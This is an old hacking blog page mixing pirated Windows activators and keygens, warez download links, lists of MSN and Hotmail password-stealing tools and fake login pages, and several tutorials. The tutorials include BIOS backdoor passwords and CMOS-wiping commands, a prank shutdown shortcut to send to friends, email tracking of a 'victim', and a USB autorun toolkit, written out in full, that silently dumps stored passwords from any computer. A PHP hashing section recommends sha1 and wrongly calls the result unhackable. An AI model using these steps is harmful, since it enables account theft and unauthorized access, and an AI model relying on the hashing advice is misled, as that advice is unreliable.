Wednesday, June 30, 2010

Yahoo Hacking


Wireless Hacking

Wireless hacking tool ---all hacking software to hack any wireless connection ...have fun !!!

trace ip

wireless hack

106 top msn and yahoo hacking software

Window's

Windows 7 32bit_Ultimate_with_daz_loader_timesurfer --------------------------------------------2408 mb

Windows 7 Loader (v1 7 5) -------------------------------------------- ----------------------------3.9 mb


Windows 7 Keygen -------------------------------------------------------------------------------------------0.7 mb

Windows 7 Tips and Tricks --------------------------------------------------------------------------------12 mb

Vista Loader - Activate Any Vista. ----------------------------------------------------------------------2 . 4 mb

Windows 7 Wallpapers ----------------------------------------------------------------------------------- 33 mb

Linux Mint 7 in Windows --------------------------------------------------------------------------------- 865 mb

Windows Vista Secrets ----------------------------------------------------------------------------------- 19 mb

Windows.Vista.Crack.Activation.Beta.1-. ------------------------------------------------------- 0.9 mb


Tricks Zone


Can you recheck your first php program which you have done with database backend support. Is there any password storing field in that ?.

If so you might saved your password as its plain text format without any encryption or hashing , right ? If not, you are very genius programmer by birth. What would happen if your database is leaked or somebody hacked your database, after you hosted your website and a lots of user registered or submitted their account with password. You are trapped. The hacker can access the user account by acquiring the password (saved without any encryption). The user can sue you for publishing his password open. So beware of this password saving while doing big project which is being hosted for a huge public usage.

Then what are the mechanism for saving password in database ?

One is you can save password after digesting or hashing , and and while rechecking the account or login you can compared the hash of password entered with the password stored in database. For that in php you can use this function:

$hash_password = sha1($password); ?>

Is this method all enough for full security. No , Never. For example, if you already know somebody’s password, say Sanjay’s password is : access, and you got the database and you will get the hash encoded string of the password: access. Suppose “XYZ123#@!” is the hash password got from database. Then you can reverse compare whether there any other user having hash text with “XYZ123#@!”, and thus you can get the password of that particular user. Hacked Again !!!

How to avoid this. Yes solution is Salting. Add some salt(random string) to current password and hash the whole password and save in database. Remember to save the salt value too in another field of the table , for rechecking the account login. Then for same password say”accesss”, you will get different hash digests. Thus the reverse caparison from know password can be avoided.


$salt = rand(1000,99999);
$hash_password = sha1($password . $salt );
?>

Is this all enough for full security. Need not to think about the same salt for same password while creating random salt value. The probability for that is .00000….followed by 1000000 zeros …1 . Means Never.

But we are not taking risk. Add some more information to the password before hashing it. Generate a global constant string that only know to the programmer say : &555$34E$ and call it Global pattern . Append this string also with password+salt string before hashing. This will create more secured digest for your password. Remember , never forgot or miss this Global pattern, otherwise you can never check the login password later. (And it is not like the salt, the value of salt is there in database table) .

$hash_password = sha1($password . $salt . auth::GlobalPattern()); ?>

Enough … No one can hack your password now, even though he get your database. Okay .

(Saving encrypted password also helps to avoid sql injection)

Okay, enjoy programming.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~***************************~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




"DOWNLOAD ALL KIND OF MEDICAL BOOKS, MOVIES,SONGS,HACKING SOFTWARE,FREE SOFTWARE ETC...JUST TYPE WHAT YOU ARE LOOKING FOR AND GET THE RESULTS IN SECONDS !!!!!!"





DOWNLOAD BULK FILES EASILY BY OUR TWO FILE DOWNLOAD MANEGER :-

1) RAPIDSHARE ACCELERATOR.EXE (FREE 100% WORKING SOFTWARE ) - Download

2) µTORRENT DOWNLOADER - Download

Note:- when you click on the download link the new window will pop-up with some kind of
advertisement just press (skip advertisement ) and you will reach the downloading page
have fun !!!!!!!!

Hack Bios PassWords !! Explanation




Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a
BIOS password is to try on of these standard
manufacturer’s backdoor passwords:

AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256,
j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER,
SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA,
ZAAADA, ZJAAADC, djonet,

AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj,phonix,toshiba


remember that passwords are Case Sensitive.

hacking BIOS via software
If you have access to
the computer when it’s turned on, you could try one of those
programs that
remove the password from the BIOS, by invalidating its memory.

However, it might happen you don’t have one of those programs when you have access
to the computer, so you’d better learn how to do manually what they do. You can reset
the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the
command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell
window in
Windows). Once you are in the debug environment enter the following
commands:

AMI/AWARD BIOS
O 70 17
O 71 17
Q

PHOENIX BIOS
O 70 FF
O 71 17
Q

GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don’t have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a “O” not the number “0″. The numbers which follow are two
bytes in hex format.

Hacking BIOS via hardware
If you can’t access the computer when it’s on, and the standard backdoor passwords
didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes
at the end of this section before to try any of these methods.
Using the jumpers
The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper
on the
motherboard (for “switching a jumper” I mean that you find a jumper that joins
the central pin and a side pin of a group of three pins, you should then unplug the
jumper and then plug it to the central pin and to the pin on the opposite side, so if the
jumper is normally on position 1-2, you have to put it on position 2-3, or viceversa).
This jumper is not always located near to the BIOS, but could be anywhere on the
motherboard.
To find the correct jumper you should read the motherboard’s manual.Once you’ve located the correct jumper, switch it (or plug or unplug it, depending from
what the manual says) while the computer is turned OFF. Wait a couple of seconds then
put the jumper back to its original position. In some motherboards it may happen that
the computer will automatically turn itself on, after flashing the BIOS. In this case, turn
it off, and put the jumper back to its original position, then turn it on again. Other
motherboards require you turn the computer on for a few seconds to flash the BIOS.
If you don’t have the motherboard’s manual, you’ll have to “bruteforce” it… trying out all
the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the
BIOS, and the ones you can switch (as I explained before). If all them fail, try all the
others. However, you must modify the status of only one jumper per attempt, otherwise
you could damage the motherboard (since you don’t know what the jumper you
modified is actually meant for). If the password request screen still appear, try another
one.
If after flashing the BIOS, the computer won’t boot when you turn it on, turn it off, and
wait some seconds before to retry.

Removing the battery
If you can’t find the jumper to flash the BIOS or if such jumper doesn’t exist, you can
remove the battery that keeps the BIOS memory alive. It’s a button-size battery
somewhere on the motherboard (on elder computers the battery could be a small,
typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side
to disconnect it, otherwise you’ll have to unsolder it and then solder it back). Take it
away for 15-30 minutes or more, then put it back and the data contained into the BIOS
memory should be volatilized. I’d suggest you to remove it for about one hour to be
sure, because if you put it back when the data aren’t erased yet you’ll have to wait more
time, as you’ve never removed it. If at first it doesn’t work, try to remove the battery
overnight.
Important note: in laptop and notebooks you don’t have to remove the computer’s power
batteries (which would be useless), but you should open your computer and remove the
CMOS battery from the motherboard.


Short-circuiting the chip
Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the
BIOS chip for a few seconds. You can do that with a small piece of electric wire or with
a bended paper clip. Always make sure that the computer is turned OFF before to try
this operation.
Here is a list of EPROM chips that are commonly used in the BIOS industry. You may
find similar chips with different names if they are compatible chips made by another
brand. If you find the BIOS chip you are working on matches with one of the following
you can try to short-cicuit the appropriate pins. Be careful, because this operation may
damage the chip.

Important
Whether is the method you use, when you flash the BIOS not only the password, but
also all the other configuration data will be reset to the factory defaults, so when you are
booting for the first time after a BIOS flash, you should enter the CMOS configuration
menu (as explained before) and fix up some things.
Also, when you boot Windows, it may happen that it finds some new device, because of
the new configuration of the BIOS, in this case you’ll probably need the Windows
installation CD because Windows may ask you for some external files. If Windows
doesn’t see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can’t
find the CD-ROM drive and you set it properly from the BIOS config, just reboot with
the reset key, and in the next run Windows should find it. However most files needed by
the system while installing new hardware could also be found in C:\WINDOWS,
C:\WINDOWS\SYSTEM, or C:\WINDOWS\INF .
change C with your windows drive letter if it is not in C drive

Enjoy Hacking!!


Make A Fake Virus...!! Cool Trick to make fool Your Friends

This is an interesting tutorial in which we will create a fake “virus” which canshutdown, restart and log off your pc(Can also write a message and specify the countdown time). This is actually a faster way to turn off your pc, ’cause it doesn’t require clicking START>TURNOFF button etc….And you can always do a little mischief by sending it to your friends ;)

1Create shortcut,(Right click on your desktop and go to new -> shortcut )
2)After this will appear window and that is where you type the code


shutdown -s -t 300 -c "Your Message"


There are few variants , this one will shutdown pc .
To log of computer type
shutdown -l -t 300 -c "your message"
To restart computer type
shutdown -r -t 300 -c " your message"
The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.

3) Click Next, Finish
4) After this will appear icon on desktop, when someone click it, shutdown box will pops up.
Enjoy!!

How to Sniff Passwords Using USB Drive


As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.



MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express,Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files –
mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exeinto your USB Drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now
copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
\
New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (
Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the
.TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the
.TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Top Hacking Software's

1000 hacking tutorials +tips

Hello Friends !! Hacking is a smart technique if you really know it.. By reading this article you may surely going to cross beginner level in hacking, so i called you a hacker in advance…..

In this internet world many user have unconditional thirst to become an hacker (or) HERO of this competative industry..

This is the amazing tutor for those who have thirst to bcome a hacker….

Just download this file and practice the trick given in this daily at your home. This will surely improve your knowledge & also your
hacking skills

Download Links :- just skip the advertisement and start downloading http://linkbee.com/FB0SN



TOP 10 vital hacking software and tools





Top 10 Vital Hacking Software and Tools | 23.6 MB

The collection contains the most necessary programs and utilities for the hacker. All is presented in a convenient environment with background music.

Contains a following software:
- Cain and Abel (sniffer)
- John the Ripper (powerful brootforce)
- NetStumbler (allows to define radius of action of network WiFi - in real time for the diagram it is possible to see size of a useful signal)
- Nmap (one of the best network scanner)
- Putty (a quite good telnet the client)
- SuperScan (powerful scanner TCP of ports, pinger and hostname resolver)
- Hping (allows to generate special ICMP/UDP/TCP packages and to look through answers ping a host in style of the usual utility ping)
- Lcp (audit and restoration of passwords Windows NT / 2000 / XP / 2003)
- Nikto (perl the scanner broken Web a server, with support SSL)
- Kismet (sniffer a wireless network 802.11 and the decoder of packages)

download :- skip the advertisement and start downloading http://linkbee.com/FB0SV



Track anyone Just by sendin mail

Well u wanna track ur victim or want to get his ip, location, browser settings, language or timings…. all u have to do is get his e-mail id…
Once u have it.
Go to
http://www.readnotify.com/
register there…
Once registered . . . send a mail to ur victim by the email id u registered at readnotify.com
But before sending the mail just add “.readnotify.com” with the victims id.. for example
xxxxx@yahoo.com.readnotify.com
and then send it…
when ever victim opens it his all the info will be mailed to u.
which can b very useful for the hackers.
Note = U can also change the settings in
http://www.readnotify.com/

You can cheak it I m not sure its working or not ..

ORKUT Hacking

get code for orkut hacking

or try this link if you live in country like USA,UK,AUS

All-in one orkut tricks

MSN ( Hot Mail ) Hacking

your all search end here ..try these free hacking software

106 top msn and yahoo hacking software

msn password hacker 2008

Hack msn 2009

msn password hacking programms2

password cracker ,msn,yahoo,gmail,etc…

or

if you are from USA,UK,AUS,NZ,CANADA THEN TRY FALLOWING LINK

PASSCRACKER -msn,yahoo,gmail.ZIP

msn fil3er password hacking tool

Msnhacktool

msn file generator

msn stealer

msn freezer

A-patch for windows live messenger 8.0-8.1

A-patch for windows live messenger 9.0wave3rc

A-patch for windows live messenger9.0wave 3beta

A-patch for windows live messenger 8.5A-patch for msn messenger

msn tribe

mss.exe

webmailhack2.4.exe

webmailhackv2.3

webmailhack2.4 keygen

msn webcamhack 2.0

msn_webcam_hack2.0.9

Tray

XPKiller

Nuke1

SariaFakeLogins2.0

Needed files

MSNSpyv1.0

MSNSpyLitev1.0

M s n spycam

MSNpasswords

MSNHackerDUC

MSNHack7.0

MSNFlooder

Locker2

MSN.Sniffer.1.2..Crack

Locker

MagicPassword-15-SE

MsnFake7

MSN.Chat.Monitor.and.Sniffer.v3.2.Incl.Keygen

HotmailHack

HotmailHackerGOLD

hotmailfullversion

HotmailHacker_XEdition

H otmailhack

HackHotmailEvolution Prov2.92

Hacking

HackMSNPassword

HotmailBrute

HeadFuckHotmailHack

fake_webpages_1

fmsn

Givemeyourpassv1.0.

Fake_Hotmail_Login_Screen.

Fakeypager

AOLKickerV.1.0.0.

fakewebpages

FakeLoginHotmail

B-S_Spy

FakeMSNMessengerVersion5.0.

1 million software serial no.

1000sofwarelink.pdf

trace ip

Wireless hacking tool----all in one tool to hack wireless connection

wireless hack

Mobile Hacking

Sweetly earn thousand of dollars with no investments, this can do anything to any mobiledownload CD
CODE
http://rapidshare.com/files/59864269/secret_of_mobile_unlocking_and_repairing_cd.part01.rar

http://rapidshare.com/files/59867862/secret_of_mobile_unlocking_and_repairing_cd.part02.rar

http://rapidshare.com/files/59871253/secret_of_mobile_unlocking_and_repairing_cd.part03.rar

http://rapidshare.com/files/59874648/secret_of_mobile_unlocking_and_repairing_cd.part04.rar

http://rapidshare.com/files/59877853/secret_of_mobile_unlocking_and_repairing_cd.part05.rar

http://rapidshare.com/files/59881235/secret_of_mobile_unlocking_and_repairing_cd.part06.rar

http://rapidshare.com/files/59884399/secret_of_mobile_unlocking_and_repairing_cd.part07.rar

http://rapidshare.com/files/59860520/secret_of_mobile_unlocking_and_repairing_cd.part08.rar

http://rapidshare.com/files/59860809/secret_of_mobile_unlocking_and_repairing_cd.part09.rar

________________________------*****------_______________________________


2000 S60 Applications Many thanks to the original compiler of this warez treasure trove.

This obviously took a lot of time to put together.

6630 as a webcam
AA VideoMSG_N6600_TIM
AAC player
About
Active Toons MMS
Activedesk
Activetoday
Activetoon SMS
AdNota
Adnota Album
Adnota Memo
Adnota Pma
Adnota6600
Adobe PDF
Adobe Reader
ADSeries
Advanced Call Manager
Advanced English dictionary
AEFox
Pro Agile Lie Detector
AgileFighter
AgileMessenger
AgoraPlus
Contacts Manager
Aiolos
AirCards
Al-Moazen
Alarm Manager
Albireo cam
All blacks
Alon Contact Guide light
Alon Contact Guide pro
Alon MP3 Player
Alon Screen Capture
Always On Mail
Amante Serials
Angel animalrazz
AniViewer
Answering Machine
Anti-mosquito
Antivirus
Antropics
facewave
Any Same Appforge
Appman Aqua Calander
Aquarium ScreenSaver
Aquasim Arcadia ScreenSaver
Arrival to Astronix
Auto Exec
Auto Lock
Auto Pilot
Auto SIS
Auto Start
AvantGo
AVEC Radio
B Cal B-campro
Baby Monitor
Baby Toy
BC Reader
Bedd Bemused
benficascreensaver
Bg Light On
Big Clock
Billiards
Binary Clock
Black Baller
Black List
Blind mice Screensaver
Blizzard Install Application
blooover Blue
Blue Marine Iconz
Blue Streamer
BlueChat
BlueJackX
Bluetooth Enhancer
BluetoothCar
Blzinstaller blzinstapp
BMI Calculaotr
BMI Calculator
Books coll
Booster
Brain
Breakthru
Bugme
Butterfly Dreams ScreenSaver
butterflyscreensaver
Calc
Calcium Calc
Call Display
Call Filter
Call Magic
Call Manager
Call Me
Call Recorder
CallCheater
CallerInfo
Cam Recorder
Camcoder
Cam
CoderPro
Camera FX
Camera Magic
Camera Timer capsulese
Card Formatter
Caricature
Cashbook Cel, Track
Cell Board
CellPos
Cepte MSN
Checker Scam
Cibenix ActiveMail
City Maps
City Time
CobraAttack
Cocktail list codec dib
Codec XVID
Coin Up
ComicSanz Font
ConsumerBooster
Contact Manager
Control Freak
Cool MMS
Cost Manager
Crazy
Cat Screensaver
Crystal DivX,MPEG etc Player
Crystal Pond ScreenSaver
DashFly Minutes
Datrys
Dct
Deluxe Todo
Desktop sms manager
DevMan
Dicta Viewer
DictaPhone
Dictionary
Digital Image Plus
Diglet Phoda
Dogfight
Doggy Screensaver
Dolphinarium ScreenSaver
DorisBrowser
DPicUp
Dr mobile
Dream Send
DreamChat
DVD Player
E MSN
E-File Manager
E-mail Password Recovery
Earth
Explorer
Easy Lock
Ebook
Ebook Maker
Eeprom clean
Egg Clock
Elog
Emailsender
EmBlaze Player
Enchore
Eprofiles
Erecorder
Esuite
EtI camcorder
Ex Call
Ex Keylock
Excel
Expense Traveler
Extended File Manager
Extended Profiles Pro
Extended Recorder
ExtendedLog
Ez Chat
Ez Play
Ez Protect
Ez Screen Locker
Ez SMS
EzSafe
Face Wrap
FaceStore Snap
Fantom overdrive
Fart Clipz
Fast Chat
Fast Reply
Fast start
Fathammer
Fb-4 Virusguard
Fget File Explorer
File Guard
FileManger
Finger Sreensaver
Fire Player
Fire Screensaver
Fireman
Fivn Player
Flash Light
Flashcards
FlexiCam Lite
FlexiCam Pro
FlirtAlert
FM Radio
FMSX Rom Tools
Font Viewer
Fontremover
Fortress SMS
Forwader
Foto
Fun Pack
FreeGravity AVECRadio
Frodo
Full Screen Caller
Full Screen Clock
Fun CAM Futuretrooper
FX Gehu
Geo CAM
Geo Minder
Geopod
Geoview
Ghameleon SnapHappy
Ghost Screensaver
Gina GITSI DEMON
Give A Buzz
Glo Banner
Glowing Eyes
Go boy
Gotenks
Gourmet
Gp
GPL
GSM Position Locator
GSMTracker
Guiness World of Records
Guitartuner
Hairstyle
Handy Photosafe
Handy Base
Handy Car
Handy Clock
Handy file
Handy Photo Safe
Handy Photosafe
Handy Reminder
Handy Reversi
Handy Safe
Handy Shopper
Handy Softwares Coll
Handy Tools
HandyBook
HandyDates
HandyExpense
Headline
HedSpeS
Hemzo
Heresy Composer
Hide and Seek
HipCam
HotViewer
IconPack
ICQ
IFD Converter
Iislo
Ilines
Image Plus
Image Spy
Imoka
In Loved Screensavers
Infrared Remote
Inside Number
Instant SIS
Intunes
IRC
IslamNet
JJ keylock
Journey
Joy Calculator
KamaSutra
Kapersky AntVirus (symbian)
Key Off Board
Key Pad Plus
Key Stick
keylock
KillerVirus
King of Sound
KODAK Pictures
Lady Series
Laguage Conversion Tools(to all lang)
Language Dictionary
Lemonade Tycoon
LieSpy lneditor
Low MemoryTester
Macromedia FlashLite(used 2 play flash files)
Mad Mixer
Magic Broom
Magic Dance Floor
MagicMine
Make SIS
MateFinder
Mathan
MC Fixer
Mcaffee Virus Scan
Media Safe
Meet
Mate
Mem Test
Memory Monitor
Message Saver
Message Storer
Metro
Mi Messenger
Micro Pool
MicroCalc
Midi Patch
Mini GPS
Minute Beep
MMC password Recovery
MMS Effects
MMSthePicture
Mobcam
Mobiclip
Mobile Fax
Mobile Girl
Mobile Horoscope
Mobile Media Maker
Mobile Mouse
Mobile News Grabber
Mobile Pocker Reader
Mobile Radio
Mobile Safe
Mobile Search
Mobile secretary
Mobile Speak
Mobile Theatre(3gp,rm player)
Mobile VDR
Mobileways Remote Professional
MobiLuck
MobiMate WorldMate
MobiMB
Mocha
Mona
Monsters Inc
Moorhen Camera X
Mouse Power Screensaver
Movie Director
Movil Foto
MP3 Base
MP3 Gravity
MP3 Player
MP3Go
Mp3Player
Mplayer
Mreader
MS Streamer
MSdriveE
MSN
Mobile Messenger
Mult Tasker
Multi Clip Board
Multicolor
Multimedia Player
Mum SMS
Music Box
Muvee
My 2 Things
My Karoke
MyCellular
MyLastCig
Myphone
N-Gage patch(1sisf----lworkingn-gagegameson6600)
Natural Recorder
Net Monitor
Netfront
Neu On ICQ nevnap
Nice Cal Nice Clock
Nice ICQ
Nokia Sensor
Note Pad
Nov IR Remote
Nutridate
Oasis Screensaver
Ogg Player
Old Talk
One 2 GOopenGL for series 60
Opera
Operator Logo Manager
Opman
Opta Player
Outliner
Ovao Uploader
oxford english disctionary (big)
Oxford English Synonymou Dictionary
Painter Studio
Panoman
Papyrus
Parked Aid
Parking Buddy
Party Screensaver
Passwords
Patch
PC Mobile Driver
PCRemote
PDF
Peeka Blue
Periodic Table
Personal Trainer
Pextender
Philps Camcorder Pro
Phocal
Phone Lock
Phone Number Rectifier
PhoneInfo
PhoneSafe
PhoneSecure
Photo Acute
Photo Art
Photo Base
Photo Editor
Photo Fusion
Photo Mailer Pro
Photo Plus
Photo Touch
Photo Twister
Photographer
PhotoID
PhotoRite
PhotoSMS
Pico Blogger pico Drive
Picture Messages
Planet Finder planet Zero
Pocket Count
Pocket Text TV
PocketQuran
Power Car
power Colck
power Dates
power Desk
Power Dictaphone
Power File
Power Navigator
Power Notes
Power
Profile
Power Safe
PowerLock
Powerpoint Viewer prime
Print Boy Profi Mail(all series)
Psiloc ListMan
Psiloc MindNine
Psiloc Negate
Psiloc Vision
Psiloc Where I Am
Puppet Master
PV-S60
PVPlayer
PVvideo
PXtheatre
PZenguin Sscreensaver
Quad Picture
Quick Office
Quick Point
Quicksheet
QuickSheets
Quickword
Quod Rings
Quoddb r21
Radar Screensaver
Radio6600
Rally Pro Contests
Read me
RealOne Player
RedMachine
Remote
Remote Surveillance
Repligo
Reqwireless Email Viewer
Reqwireless HotViewer
Reqwireless WebViewer
Resco News
Resco Photoviewer
Resistance
Restart
Rhytms
Ring Master Prp
Ringtone Studio
Rite Viewers
RSS Manager
Ruby lin MP3 Skin
Rvg Doom
S Mobile Virus Guard
s60_themes-nuke-

#mediaplace-part2

SBasic
ScanSoft TTS
Scientific Calculator
Screen Capture
Screen Saver
Screen Taker
ScreenSaver
screenshot
Search
SeleQ
Shiuu screensaver
Shopping List
Sim Watcher
Simworks AntiVirus
SkinEditor
Skype
Slide Show
slovoed Smart Answer
Smart Birthday
Smart Calculator
Smart Card
Smart Com
Smart Guard
Smart Launcher
Smart Live
Smart movie
Smart Plus
Smart Profiles
Smart Vision
Smartcom GPS
SmartCrypto
SmartMovie
SMS Assistant
SMS Bet
SMS Counter
SMS Face
SMS fake
SMS Guard
SMS I Love You
SMS love
SMS Machine
SMS Planner
SMS Scheduler
SMS Tiner
Snow Globe
ScreenSaver
Sonic Boy
Sound Monitor
Space Doubler
Speechworks
Spell Checker
Spinning Ball
Splash ID
Splash Photo
Sport Calander
Sport
Seeker
Spy
Spy Call
Spy Cam
Spy6600
Stacker
Status Monitor
Stop Watch
Super Imposer
Suprise Disco
Suprise Jelly
Surprise Lenses
Surprise
Sounder
Sweetass
Switcher
Symbian Commander
symella Syntrax Free
Synthesizer
System Explorer
System Info
System Manager
System
Tools
Talking Clock
Talks
Task Manager
Task Sheet
Task SPY
Task Switcher
Tele Text
Telesekreter
The beer Engine
Theft Alert
Thesarus
Thugsta
Time
Time Tool
Time Zone Display
Timed SPY
Timedcall
Todo Manager
Tom Mobile
Torch
Total IR Remote
Tramonto
TriplePop
tubelisbon1.02
Turbo MSN
Ulead Photo Express Lite
Ultra MP3
Ultramod
Unlocker
V Disk
Veri Chat
vexplorer1.0
vibrator
Video Messaging
Video Recorded Sound
Video Tone
VideoEditor
VideoMSG
videomsg6600
videozonereal
Viking Infomatics DVD Player
Viking MP3 Player ------ Radio
Virus Scan
Visual Communicator
Vnes
Voice Call Master
voicedialer
Volcano ScreenSaver
Wallpaper Changer
Watchtone Studio
Wave
Wayfinder
wayspot
Web View
WebGate CoMobi
wibcapture
Wild Skinz
Wireless IRC
WiSend
World Clock Pro
World Mate
World Traveller
Wow Screens
X-Ray Camera
xblue
XCaller
Xpense Traveller
XpressMMS
Yedit
Yellow FTP
yewmarquee
Yewnes
YewSprite
yin-yenscreensaver
YoYap
Z Contact Sender
Z Font Remover
Z Input Restorer
Z Screen Capture
Z-Antivirus
Zeno Morph
Zensis RiteViewer
Zion
Zipman
ZMessaging
zseblampa
Zun Fat Camera

PART 1 - http://rapidshare.de/files/31544268/MAS60.part1.rar

PART 2 - http://rapidshare.de/files/31541246/MAS60.part2.rar




mobile hacking codes

nokia,samsung, free gprs ,airtel,and many more

Nokia Service Mannuals hacked

Nokia 6210 :
Code:
http://rapidshare.com/files/98495078/nokia_206210_20service_20manual.rar
Nokia 6110 :
Code:
http://rapidshare.com/files/98495103/nokia_206110_20service_20manual.rar
Nokia 6310 :
Code:
http://rapidshare.com/files/98495105/6310_20service_20manual.rar
Nokia 5110 :
Code:
http://rapidshare.com/files/98495106/nokia_205110_20service_20manual.rar
Nokia 3210 :
Code:
http://rapidshare.com/files/98495107/nokia_203210_20service_20manual.rar
Nokia 6150 :
Code:
http://rapidshare.com/files/98495124/nokia_206150_20service_20manual.rar
Nokia 3310 :
Code:
http://rapidshare.com/files/98495140/nokia_203310_20service_20manual.rar
Nokia 8810 :
Code:
http://rapidshare.com/files/98495141/nokia_208810_20service_20manual.rar
Nokia 8310 :
Code:
http://rapidshare.com/files/98495144/nokia_208310_20service_20manual.rar
Nokia 8210 :
Code:
http://rapidshare.com/files/98495150/nokia_208210_20service_20manual.rar
Nokia 8850 :
Code:
http://rapidshare.com/files/98495151/nokia_208850_20service_20manual.rar
Nokia 7110 :
Code:
http://rapidshare.com/files/98495161/nokia_207110_20service_20manual.rar
Nokia 8890 :
Code:
http://rapidshare.com/files/98495214/nokia_208890_20service_20manual.rar
Nokia 9110 :
Code:
http://rapidshare.com/files/98495216/nokia_209110_20service_20manual.rar